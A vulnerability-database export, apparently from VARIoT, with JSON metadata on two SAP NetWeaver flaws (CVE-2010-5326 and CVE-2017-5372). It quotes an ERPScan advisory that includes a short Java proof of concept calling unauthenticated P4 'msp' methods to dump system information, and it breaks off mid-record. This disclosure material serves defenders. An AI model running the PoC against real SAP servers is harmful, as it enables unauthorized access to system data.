server. An attacker may leverage this issue to execute arbitrary script code within the context of the affected application
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201605-0004",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.5,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.1,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver application server java",
"scope": "lte",
"trust": 1.0,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver sp15",
"scope": "eq",
"trust": 0.9,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver sp8",
"scope": "eq",
"trust": 0.9,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.9,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.9,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.9,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver application server java",
"scope": "lt",
"trust": 0.8,
"vendor": "sap",
"version": "7.3"
},
{
"model": "solution manager",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
},
{
"model": "supply chain management",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
},
{
"model": "product lifecycle management",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
},
{
"model": "netweaver composition environment",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
},
{
"model": "exchange infrastructure",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
},
{
"model": "enterprise portal",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
},
{
"model": "netweaver sp15",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "7.0*"
},
{
"model": "netweaver sp8",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "7.0*"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "7.10*"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "7.30*"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "7.02*"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "7.01*"
}
],
"sources": [
{
"db": "IVD",
"id": "39506c1a-1f8e-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2905"
},
{
"db": "BID",
"id": "90533"
},
{
"db": "BID",
"id": "48925"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002737"
},
{
"db": "NVD",
"id": "CVE-2010-5326"
},
{
"db": "CNNVD",
"id": "CNNVD-201605-399"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.30",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2010-5326"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Onapsis Security",
"sources": [
{
"db": "BID",
"id": "90533"
},
{
"db": "BID",
"id": "48925"
},
{
"db": "CNNVD",
"id": "CNNVD-201107-453"
}
],
"trust": 1.2
},
"cve": "CVE-2010-5326",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": true,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2010-5326",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "39506c1a-1f8e-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 10.0,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 6.0,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 10.0,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2010-5326",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2010-5326",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-201605-399",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "IVD",
"id": "39506c1a-1f8e-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2010-5326",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "39506c1a-1f8e-11e6-abef-000c29c66e3d"
},
{
"db": "VULMON",
"id": "CVE-2010-5326"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002737"
},
{
"db": "NVD",
"id": "CVE-2010-5326"
},
{
"db": "CNNVD",
"id": "CNNVD-201605-399"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Invoker Servlet on SAP NetWeaver Application Server Java platforms, possibly before 7.3, does not require authentication, which allows remote attackers to execute arbitrary code via an HTTP or HTTPS request, as exploited in the wild in 2013 through 2016, aka a \"Detour\" attack. Attacks on this vulnerability 2013 From 2016 Observed in year. This vulnerability \"Detour\" It is called an attack. Vendors have confirmed this vulnerability SAP Security Note 1445998 It is released as.By a third party HTTP Or HTTPS Arbitrary code may be executed via a request. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. The SAP Netweaver Invoker Servlet has a security vulnerability that allows an attacker to call any servlet even if it is declared in a web.xml file. This includes any servlet classes available in the application classloader, such as those in the WEB-INF\\\\classes, WEB-INF\\\\lib, and WEB-INF\\\\additinal-lib application directories. Multiple servlets included with Java applications are not designed for direct client access, but instead interact inside the application, thus causing arbitrary calls to be performed and invisible operations on the SAP server. \nAn attacker may leverage this issue to execute arbitrary script code within the context of the affected application",
"sources": [
{
"db": "NVD",
"id": "CVE-2010-5326"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002737"
},
{
"db": "CNVD",
"id": "CNVD-2011-2905"
},
{
"db": "BID",
"id": "90533"
},
{
"db": "BID",
"id": "48925"
},
{
"db": "IVD",
"id": "39506c1a-1f8e-11e6-abef-000c29c66e3d"
},
{
"db": "VULMON",
"id": "CVE-2010-5326"
}
],
"trust": 2.97
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "48925",
"trust": 3.2
},
{
"db": "NVD",
"id": "CVE-2010-5326",
"trust": 2.8
},
{
"db": "USCERT",
"id": "TA16-132A",
"trust": 2.5
},
{
"db": "BID",
"id": "90533",
"trust": 2.0
},
{
"db": "CNVD",
"id": "CNVD-2011-2905",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002737",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201107-453",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201605-399",
"trust": 0.6
},
{
"db": "IVD",
"id": "39506C1A-1F8E-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "VULMON",
"id": "CVE-2010-5326",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "39506c1a-1f8e-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2905"
},
{
"db": "VULMON",
"id": "CVE-2010-5326"
},
{
"db": "BID",
"id": "90533"
},
{
"db": "BID",
"id": "48925"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002737"
},
{
"db": "NVD",
"id": "CVE-2010-5326"
},
{
"db": "CNNVD",
"id": "CNNVD-201107-453"
},
{
"db": "CNNVD",
"id": "CNNVD-201605-399"
}
]
},
"id": "VAR-201605-0004",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "39506c1a-1f8e-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2905"
}
],
"trust": 1.3171288840000002
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "39506c1a-1f8e-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2905"
}
]
},
"last_update_date": "2023-12-18T13:03:19.061000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Invoker Servlet",
"trust": 0.8,
"url": "http://help.sap.com/saphelp_nw70ehp2/helpdata/en/bb/f2b9d88ba4e8459e5a69cb513597ec/frameset.htm"
},
{
"title": "US-CERT \u30a2\u30e9\u30fc\u30c8\u60c5\u5831\uff1aSAP \u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30ce\u30fc\u30c8 1445998 \u3067\u89e3\u6c7a\u6e08\u307f\u306e\u554f\u984c\u306b\u3064\u3044\u3066\u518d\u5ea6\u306e\u304a\u77e5\u3089\u305b",
"trust": 0.8,
"url": "https://support.sap.com/ja.html"
},
{
"title": "Patch for SAP Netweaver Invoker Servlet Remote Code Execution Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/4568"
},
{
"title": "SAP NetWeaver Application Server Invoker Servlet Fixes for arbitrary code execution vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=61715"
},
{
"title": "The Register",
"trust": 0.2,
"url": "https://www.theregister.co.uk/2021/04/06/sap_patch_attacks/"
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/sap-bugs-cyberattack-compromise/165265/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-2905"
},
{
"db": "VULMON",
"id": "CVE-2010-5326"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002737"
},
{
"db": "CNNVD",
"id": "CNNVD-201605-399"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2010-5326"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.onapsis.com/threat-report-tip-iceberg-wild-exploitation-cyber-attacks-sap-business-applications"
},
{
"trust": 2.5,
"url": "http://www.onapsis.com/research/publications/sap-security-in-depth-vol4-the-invoker-servlet-a-dangerous-detour-into-sap-java-solutions"
},
{
"trust": 2.5,
"url": "http://www.us-cert.gov/ncas/alerts/ta16-132a"
},
{
"trust": 2.3,
"url": "http://www.securityfocus.com/bid/48925"
},
{
"trust": 1.8,
"url": "http://www.securityfocus.com/bid/90533"
},
{
"trust": 1.7,
"url": "http://service.sap.com/sap/support/notes/1445998"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-5326"
},
{
"trust": 0.8,
"url": "http://jvn.jp/ta/jvnta91951276/index.html"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2010-5326"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/48925/info"
},
{
"trust": 0.6,
"url": "http://www.onapsis.com/resources/download.php?id=7wkeuqheij%2bqq3jv4qpdjl1ffrxqqxpj5uloink%2bzeilka6bds1fhqzomd%2bpokyossoouymyxkdykay2dgrh\u0026lang=en ."
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.theregister.co.uk/2021/04/06/sap_patch_attacks/"
},
{
"trust": 0.1,
"url": "https://threatpost.com/sap-bugs-cyberattack-compromise/165265/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-2905"
},
{
"db": "VULMON",
"id": "CVE-2010-5326"
},
{
"db": "BID",
"id": "90533"
},
{
"db": "BID",
"id": "48925"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002737"
},
{
"db": "NVD",
"id": "CVE-2010-5326"
},
{
"db": "CNNVD",
"id": "CNNVD-201107-453"
},
{
"db": "CNNVD",
"id": "CNNVD-201605-399"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "39506c1a-1f8e-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2905"
},
{
"db": "VULMON",
"id": "CVE-2010-5326"
},
{
"db": "BID",
"id": "90533"
},
{
"db": "BID",
"id": "48925"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-002737"
},
{
"db": "NVD",
"id": "CVE-2010-5326"
},
{
"db": "CNNVD",
"id": "CNNVD-201107-453"
},
{
"db": "CNNVD",
"id": "CNNVD-201605-399"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-07-29T00:00:00",
"db": "IVD",
"id": "39506c1a-1f8e-11e6-abef-000c29c66e3d"
},
{
"date": "2011-07-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-2905"
},
{
"date": "2016-05-13T00:00:00",
"db": "VULMON",
"id": "CVE-2010-5326"
},
{
"date": "2016-05-11T00:00:00",
"db": "BID",
"id": "90533"
},
{
"date": "2011-07-28T00:00:00",
"db": "BID",
"id": "48925"
},
{
"date": "2016-05-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-002737"
},
{
"date": "2016-05-13T10:59:00.173000",
"db": "NVD",
"id": "CVE-2010-5326"
},
{
"date": "1900-01-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201107-453"
},
{
"date": "2016-05-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201605-399"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-07-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-2905"
},
{
"date": "2021-04-20T00:00:00",
"db": "VULMON",
"id": "CVE-2010-5326"
},
{
"date": "2016-07-05T22:21:00",
"db": "BID",
"id": "90533"
},
{
"date": "2011-07-28T00:00:00",
"db": "BID",
"id": "48925"
},
{
"date": "2016-05-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-002737"
},
{
"date": "2021-04-20T18:41:50.707000",
"db": "NVD",
"id": "CVE-2010-5326"
},
{
"date": "2011-08-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201107-453"
},
{
"date": "2021-04-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201605-399"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201107-453"
},
{
"db": "CNNVD",
"id": "CNNVD-201605-399"
}
],
"trust": 1.2
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver Invoker Servlet Remote code execution vulnerability",
"sources": [
{
"db": "IVD",
"id": "39506c1a-1f8e-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2905"
},
{
"db": "BID",
"id": "48925"
},
{
"db": "CNNVD",
"id": "CNNVD-201107-453"
}
],
"trust": 1.7
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Code injection",
"sources": [
{
"db": "IVD",
"id": "39506c1a-1f8e-11e6-abef-000c29c66e3d"
},
{
"db": "CNNVD",
"id": "CNNVD-201107-453"
}
],
"trust": 0.8
}
}
var-201701-0793
Vulnerability from variot
The function msp (aka MSPRuntimeInterface) in the P4 SERVERCORE component in SAP AS JAVA allows remote attackers to obtain sensitive system information by leveraging a missing authorization check for the (1) getInformation, (2) getParameters, (3) getServiceInfo, (4) getStatistic, or (5) getClientStatistic function, aka SAP Security Note 2331908. SAP Netweaver Application Server Java is prone to an authorization-bypass vulnerability. Attackers can exploit this issue to gain unauthorized access and obtain sensitive information or elevate privileges. This may aid in further attacks. Application: SAP NetWeaver AS JAVA
Versions Affected: SAP NetWeaver AS JAVA 7.11-7.4
Vendor URL: http://SAP.com
Bugs: Information disclosure
Sent: 10.03.2016
Reported: 11.03.2016
Vendor response: 11.03.2016
Date of Public Advisory: 12.10.2016
Reference: SAP Security Note 2331908
Author: Vahagn @vah_13 Vardanyan (ERPScan)
Description
- ADVISORY INFORMATION
Title:[ERPSCAN-16-037] SAP NetWeaver AS JAVA P4 MSPRUNTIMEINTERFACE INFORMATION DISCLOSURE
Advisory ID:[ERPSCAN-16-037]
Risk: high
Advisory URL: https://erpscan.com/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/
Date published: 11.01.2017
Vendors contacted: SAP
- VULNERABILITY INFORMATION
Class: Information disclosure
Impact: broken authentication
Remotely Exploitable: yes
Locally Exploitable: no
CVE: CVE-2017-5372
CVSS Information
CVSS Base Score v3: 7.3 / 10
CVSS Base Vector:
AV : Attack Vector (Related exploit range) Network (N)
AC : Attack Complexity (Required attack complexity) Low (L)
PR : Privileges Required (Level of privileges needed to exploit) None (N)
UI : User Interaction (Required user participation) None (N)
S : Scope (Change in scope due to impact caused to components beyond the vulnerable component) Unchanged (U)
C : Impact to Confidentiality Low (L)
I : Impact to Integrity Low (L)
A : Impact to Availability Low (L)
-
VULNERABLE PACKAGES
SERVERCORE
7.11 7.20 7.30 7.31 7.40 7.50
- SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2331908
- AUTHOR
Vahagn Vardanyan (ERPScan)
- TECHNICAL DESCRIPTION
SAP AS JAVA P4 function msp (MSPRuntimeInterface) does not require any authorization to call the following functions:
getInformation
getParameters
getServiceInfo
getStatistic
getClientStatistic
PoC (Java language)
package sap_p4_poc;
Properties p = new Properties();
p.put("java.naming.factory.initial", "com.sap.engine.services.jndi.InitialContextFactoryImpl");
p.put("java.naming.provider.url", SAP_IP+":"+SAP_PORT);
InitialContext initialContext = new InitialContext(p);
Context initialContext = initialContext;
MSPRuntimeInterface serialObj = (MSPRuntimeInterface)initialContext.lookup("msp");
System.out.println("----------------" + serialObj + "----------------------------------------");
System.out.println("----------------SID:" + serialObj.getSystemId() + "----------------------------------------");
System.out.println("----------------------getInformation:--------------------------------");
TreeMap Inf = serialObj.getInformation();
print_treee_map(Inf);
System.out.println("----------------------getParameters:----------------------------------");
TreeMap Par = serialObj.getParameters();
print_treee_map(Par);
System.out.println("-----------------------getServiceInfo:---------------------------------");
TreeMap Serv = serialObj.getServiceInfo();
print_treee_map(Serv);
System.out.println("-----------------------getStatistic:---------------------------------");
TreeMap Stat = serialObj.getStatistic();
print_treee_map(Stat);
System.out.println("-----------------------getClientStatistic:---------------------------------");
TreeMap Cli = serialObj.getClientStatistic();
print_treee_map(Cli);
- REPORT TIMELINE
Reported: 11.03.2016
Vendor response: 11.03.2016
Date of Public Advisory: 12.10.2016
- REFERENCES
https://erpscan.com/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/
- ABOUT ERPScan Research
ERPScan research team specializes in vulnerability research and analysis of critical enterprise applications. It was acknowledged multiple times by the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!).
ERPScan researchers are proud of discovering new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the "The Best Server-Side Bug" nomination at BlackHat 2013.
ERPScan experts participated as speakers, presenters, and trainers at 60+ prime international security conferences in 25+ countries across the continents ( e.g. BlackHat, RSA, HITB) and conducted private trainings for several Fortune 2000 companies.
ERPScan researchers carry out the EAS-SEC project that is focused on enterprise application security awareness by issuing annual SAP security researches.
ERPScan experts were interviewed in specialized info-sec resources and featured in major media worldwide. Among them there are Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, Chinabyte, etc.
Our team consists of highly-qualified researchers, specialized in various fields of cybersecurity (from web application to ICS/SCADA systems), gathering their experience to conduct the best SAP security research.
- ABOUT ERPScan
ERPScan is the most respected and credible Business Application Cybersecurity provider. Founded in 2010, the company operates globally and enables large Oil and Gas, Financial, Retail and other organizations to secure their mission-critical processes. Named as an aEmerging Vendora in Security by CRN, listed among aTOP 100 SAP Solution providersa and distinguished by 30+ other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to assist in improving the security of their latest solutions.
ERPScanas primary mission is to close the gap between technical and business security, and provide solutions for CISO's to evaluate and secure SAP and Oracle ERP systems and business-critical applications from both cyberattacks and internal fraud. As a rule, our clients are large enterprises, Fortune 2000 companies and MSPs, whose requirements are to actively monitor and manage security of vast SAP and Oracle landscapes on a global scale.
We afollow the suna and have two hubs, located in Palo Alto and Amsterdam, to provide threat intelligence services, continuous support and to operate local offices and partner network spanning 20+ countries around the globe.
Adress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301
Phone: 650.798.5255
Twitter: @erpscan
Scoop-it: Business Application Security
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201701-0793",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": null,
"trust": 1.4,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "*"
},
{
"model": "netweaver as java",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver as java",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.42"
},
{
"model": "netweaver as java",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver as java",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
